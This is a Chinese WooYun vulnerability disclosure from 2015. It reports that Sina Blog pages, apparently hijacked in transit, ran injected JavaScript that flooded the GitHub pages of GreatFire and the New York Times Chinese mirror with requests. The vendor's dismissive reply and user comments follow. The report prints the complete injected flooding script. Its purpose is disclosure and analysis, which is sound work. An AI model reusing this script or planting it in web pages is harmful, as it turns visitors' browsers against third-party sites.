当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105146

漏洞标题:新浪博客疑似被流量劫持攻击Github(目标纽约时报和某墙仓库)

相关厂商:新浪

漏洞作者: yfff

提交时间:2015-04-01 10:17

修复时间:2015-04-03 19:16

公开时间:2015-04-03 19:16

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新浪博客疑似被流量劫持攻击Github(目标纽约时报和某墙仓库)

详细说明:

今天访问新浪博客的时候,发现总是弹出下面这个警告

alert.PNG


因为频率非常高,怀疑自己中招了,于是看了下流量

network.PNG


为什么是github啊。。greatfire又是什么鬼
可以看出不断在访问下面两个页面

nytimes.PNG


greatfire.PNG


应该是被流量劫持了。。
然后github那边可能拒绝了这边的流量,所以不断弹出警告

漏洞证明:

研究了下代码,应该是下面这行搞的鬼

insert.PNG


我觉得应该是网页被劫持然后用户访问的时候会被注入代码
希望还是修复下好

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");!window.jQuery&&document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime=(new Date).getTime();var count=0;function unixtime(){var a=new Date;return Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire","https://github.com/cn-nytimes"];NUM=url_array.length;function r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new Date).getTime()},complete:function(){responseTime=(new Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3); 
这里面可以看到url_array=["https://github.com/greatfire","https://github.com/cn-nytimes"]; 还有{var a=unixtime()%NUM;get(url_array[a])}

修复方案:

建议直接修复被劫持的页面

版权声明:转载请注明来源 yfff@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-03 19:16

厂商回复:

我们已经收到来自各方的报告,在国外部分地区会出现该问题,你懂的,此现象我们也很无奈,正在协商排查。

漏洞Rank:8 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-01 10:20 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    洞主能提供下完整的js代码么?

  2. 2015-04-01 10:24 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    警告: 页面中发现恶意js代码

  3. 2015-04-01 12:18 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @yfff 收到,已经帮你转移到报告内部了 :)

  4. 2015-04-03 19:19 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    我们已经收到来自各方的报告,在国外部分地区会出现该问题,你懂的,此现象我们也很无奈,正在协商排查。

  5. 2015-04-03 20:33 | Icebreaker ( 路人 | Rank:10 漏洞数:2 | 方向比努力重要,能力比知识重要,健康比成...)

    六六六六

  6. 2015-04-07 17:37 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    你懂的。。。。在China只有刘德华,张学友,张学友

  7. 2015-04-07 17:37 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    @Arthur 郭富城